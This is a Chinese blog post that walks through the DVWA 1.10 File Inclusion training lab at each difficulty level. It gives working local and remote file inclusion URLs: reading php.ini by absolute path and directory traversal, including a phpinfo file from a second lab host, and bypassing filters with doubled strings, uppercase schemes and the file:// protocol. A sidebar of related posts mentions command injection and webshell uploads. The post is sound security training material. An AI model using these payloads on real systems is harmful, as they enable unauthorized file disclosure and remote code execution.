DVWA1.10File Inclusion

最新推荐文章于 2021-07-11 23:46:40 发布
最新推荐文章于 2021-07-11 23:46:40 发布
阅读量167 收藏
点赞数
分类专栏: 信息安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/whimewcm/article/details/109697258
版权

LOW

file_inclusion_low
low 等级的服务端代码没有对输入的page参数做任何过滤和检查。随意构造url查看报错信息:

http://192.168.29.128/DVWA-master/vulnerabilities/fi/?page=1.txt

在这里插入图片描述
根据暴露的服务器路径信息构造url(可多次尝试)

http://192.168.29.128/DVWA-master/vulnerabilities/fi/?page=C:\xampp\htdocs\DVWA-master\php.ini

在这里插入图片描述
成功读取到php.ini文件。magic_quotes_gpc为off时,php5.3.4以下存在%00截断漏洞。使用相对路径同样可以读取ini文件,只要…\ 足够多,然后从盘根目录开始遍历。
http://192.168.29.128/DVWA-master/vulnerabilities/fi/?page=..\..\..\..\..\xampp\htdocs\DVWA-master\php.ini
根据php.ini的信息,allow_url_include和allow_url_fopen都为on,存在远程文件包含漏洞。在KALI服务器上上传一个利用文件。
phpinfo.txt
成功执行phpinfo函数。
phpinfo()
还使用URL编码对链接进行隐藏

%68%74%74%70%3a%2%2f%31%39%32%2e%31%36%38%2e%32%39%2e%31%33%30%2%70%68%70%69%6e%66%6f%2e%74%78%74

MEDIUM

medium
medium级的代码使用str_replace对https://,http://,…/,…\进行删除,但还是存在绕过的方法,可以使用双写或使用绝对路径的方式绕过。

  • 双写

http://192.168.29.128/DVWA-master/vulnerabilities/fi/?page=htthttp://p://192.168.29.130/phpinfo.txt

双写绕过

http://192.168.29.128/DVWA-master/vulnerabilities/fi/?page=…//…//…//…//…//xampp/htdocs/DVWA-master/php.ini

在这里插入图片描述

  • 绝对路径

http://192.168.29.128/DVWA-master/vulnerabilities/fi/?page=C:/xampp/htdocs/DVWA-master/php.ini

在这里插入图片描述
另外,str_replace大小写敏感,可以使用大写方式绕过对http://的过滤。

http://192.168.29.128/DVWA-master/vulnerabilities/fi/?page=HTTP%3a%2f%2f192.168.29.130%2fphpinfo.txt

HTTP

HIGH

File_inclusion_high

fnmatch(pattern,string,flags)
根据指定的模式pattern对文件名或字符串string进行匹配,自php5.3.0及以上开始在windows平台上生效。

可利用file协议绕过,需要结合文件上传漏洞才可以实现任意命令执行。

http://192.168.29.128/DVWA-master/vulnerabilities/fi/?page=file:///C:/xampp/htdocs/DVWA-master/php.ini

file_protocol

IMPOSSIBLE

impossible级别使用了白名单过滤机制,page参数被限制为对应的四个文件名,不存在文件包含漏洞。
file_inclusion_impossible

whime_sakura
关注
专栏目录
DVWA靶场搭建与使用
09-02
**DVWA靶场搭建与使用** DVWA(Damn Vulnerable Web Application)是一个开源的Web应用程序,专门为网络安全专业人员、开发人员和学生设计,用于学习和练习常见Web应用漏洞的识别和利用。它提供了多种安全漏洞的...
DVWA通关手册.docx
08-19
文档内部包含DVWA平台,所有类型漏洞低中高等级的攻击过程,非常仔细。也有部分自己的攻击方法,值得一试。
DVWA-master.zip
01-04
DVWA:渗透测试与网络安全学习平台》 DVWA(Damn Vulnerable Web Application)是一个用于安全测试和教育目的的开源Web应用程序。它旨在帮助安全专业人员、开发人员和学生了解常见Web应用程序漏洞,并提供实践...
DVWA-master.7z 压缩包
最新发布
09-14
DVWA(Damn Vulnerable Web Application)是一个开源的Web应用程序,设计用于帮助安全专业人员测试他们的安全技能和工具,同时也为开发人员提供一个平台来了解常见Web应用漏洞的本质。这个"DVWA-master.7z"压缩包...
DVWA Installation
08-15
**DVWA(Damn Vulnerable Web Application)安装指南** Damn Vulnerable Web Application,简称DVWA,是一个专门为网络安全教育设计的开源Web应用程序。它包含了各种常见Web应用漏洞,如SQL注入、跨站脚本(XSS)、...
使用pwdump 导出本地windows SAM散列并破解
热门推荐
whime
12-22 1万+
来源:shiyanbar.com,仅作为笔记,侵删 Windows hash由二部分组成,分别是LM HASH&NT HASH。Windows系统关于hash的组成如下: 用户名称:RID: LM-HASH值:NT-HASH值 LM HASH生成规则: 1.用户的密码被限制为最多14个字符。 2.用户的密码转换为大写。 3.系统中用户的密码编码使用了OEM内码页 4.密码不足14字节...
suricata规则编写-检测ssh爆破攻击
whime
05-22 3731
步骤: 1. 使用hydra攻击ssh服务器,利用tcpdump 抓包。 2. 编写suricata规则 3. 重放pcap包测试效果。 利用hydra和 tcpdump获取攻击流量包 在
suricata规则编写-检测SYN-Flood攻击
whime
05-22 3500
步骤 Kali虚拟机使用hping3发起SYN泛洪攻击,伪造随机地址。 利用flags标志和threshold关键字编写规则 测试 hping3发起SYN泛洪攻击 利用Kali工具hping3 发起SYN半连接泛洪攻击 编写规则 suricata兼容snort规则 ,使用flags标志配合threshold编写规则,flags:S表示匹配SYN标志位为1的tcp包,根据dst进行跟踪,在30...
filebeat 配置简单优化
whime
05-22 2195
filebeat 配置优化 实验环境 本架构采用 filebeat + ELK搭建,将suricata节点收集到的日志数据通过filebeat 发送到logstash,由logstash 发送到 elasticsearch 进行索引。 filebeat: 单核,主存3GB。 ELK: 双核,主存8GB 问题描述 通过kibana的监视工具xpack可以看到,elasticsearch ...
zeek脚本编写-检测局域网内的http代理
whime
05-22 1208
根据官网的例子写了个zeek脚本,检测局域网内的http代理服务器(可能被用作恶意行为的跳板。 搭建简陋的http代理 http代理的作用就是转发客户端的http请求的功能,主要用到工具如下: kali主机:ip 192.168.140.131, 预装burpsuite和tcpdump。 ubuntu16.04: firefox浏览器。 首先,Kali主机作为http代理,开启burpsuite...
zeek脚本编写-检测匿名代理ip
whime
05-22 807
从网上下载到一个匿名ip范围数据库,编写了zeek脚本用于检测源地址为匿名的连接。 匿名ip范围数据库 数据文件中有多个字段,此处主要用到ip_from,ip_to,proxy_type,ip_from和ip_to不是点分十进制表示,而是对应ip的32位整数表示。 编写脚本 脚本逻辑: 定义ip范围和代理类型的表,之后通过Input::add_table读入数据。从connection中获取源i...
数据包处理程序scapy
whime
12-26 745
来源:shiyanbar.com,仅作为笔记,侵删  Scapy是Python写的一个功能强大的交互式数据包处理程序,可用来发送、嗅探、解析和伪造网络数据包,常常被用到网络攻击和测试中。 在kali下终端输入scapy进入交互界面,使用ARP().display()可以显示arp包模板,IP().display()同理。使用IP()赋值可根据模板构造ip数据包,ICMP()构造一个icmp包。...
DVWA1.10_Brute_Force
whime
07-11 384
low等级 查看源代码可知,在php脚本中只检查了Login变量是否设置,没有对user,password参数进行过滤,存在注入漏洞。由于password参数进行了md5散列,并且只有结果集只有一行才可以通过验证,所以只能对用户名进行注入。如 ’ or 1=1 limit 1,1# 使用Burp Suite进行爆破,抓包选择爆破的参数,选择Kali 自带的字典rockyou.txt 进行爆破,得出密码为password。 medium等级 medium等级使用了mysqli_real_escape_s.
DVWA1.10_CSRF
whime
07-11 359
LOW 服务器收到提交的新密码和确认密码之后,比较是否相同,相同则修改密码,没有任何防护机制。此处可以简单构造带有参数的链接诱导用户点击: http://192.168.29.128/DVWA-master/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change# 但是点击之后会出现修改成功页面,用户很容易发现密码已经被修改了。 攻击者还可以诱导用户访问特定页面,将链接隐藏在标签中.
DVWA1.10_Command_Injection
whime
07-11 303
low low等级中通过获取ip参数,然后根据系统类型执行ping命令,没有对ip参数进行过滤,存在严重的命令注入漏洞。 不管是Linux还是Windows系统都可以使用&&连接执行多个命令。 medium medium增加了对“&&”,“;”的符号处理,将在黑名单中的符号删除。 黑名单过滤的符号只有“&&”,“;”,所以还是存在命令注入漏洞。如输入127.0.0.1 &net user,&用于连接多个命令,所有命令都会被执行;&amp.
DVWA1.10 File Upload
whime
07-11 205
LOW low级别没有对上传的文件进行任何的检查,生成存放路径后直接移动文件,并返回上传成功与否的信息,存在明显的上传漏洞。使用Kali系统上的weevely生成木马上传,并获得木马文件路径。 在Kali中使用weevely连接 成功连接后门可以使用weevely查看系统信息,系统类型,php版本,主机名都暴露出来 进行网络端口扫描 MEDIUM MEDIUM级别对上传文件的类型和大小做出了限制,文件类型只能为jpeg或者png,大小不超过100000Byte。 尝试修改文件后缀名为jpg,成功上
DVWA1.10-Sql Injection
whime
07-11 163
LOW LOW级别没有对输入参数进行任何检查过滤,直接插入sql语句查询,存在很大的注入漏洞。 首先依次使用以下语句可以判断为字符型注入。 输入1 输入1’ and ‘1’=‘1 输入1’ and ‘1’=‘2,查询失败,由此可以说明存在字符型注入。 使用union猜解sql查询语句中的字段数 1’ union select 1,2#,使用其他语句如1‘ union select 1#和1’ union select 1,2,3#都报错The used SELECT statements have
记录搭建日志分析系统ELK踩的坑
whime
07-11 162
qemu安装过程出现无法挂载,kernel panic not syncing,no working init found,尝试在装载虚拟机的命令里加-m选项,指定内存大小。 qemu实现主客机剪贴板共享
dvwa file inclusionfile upload
05-12
DVWA(Damn Vulnerable Web Application)是一个用于演示Web应用程序安全漏洞的教育性平台。其中包括文件包含(File Inclusion)和文件上传(File Upload)两种漏洞。 文件包含漏洞是指Web应用程序未对用户输入的文件路径进行充分验证,导致攻击者能够构造恶意的文件路径来读取、执行或删除服务器上的敏感文件。攻击者可以通过这种方式获取服务器上的重要信息,甚至能够获取Web应用程序的所有权限。 文件上传漏洞是指Web应用程序未对上传的文件进行充分验证和过滤,导致攻击者能够上传恶意文件并执行任意代码。攻击者可以通过这种方式获取服务器上的敏感信息、修改文件内容,甚至能够控制整个Web应用程序。 在DVWA中,可以通过模拟这两种漏洞,来帮助开发者、安全研究人员和测试人员了解和学习如何发现和修复这些漏洞。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值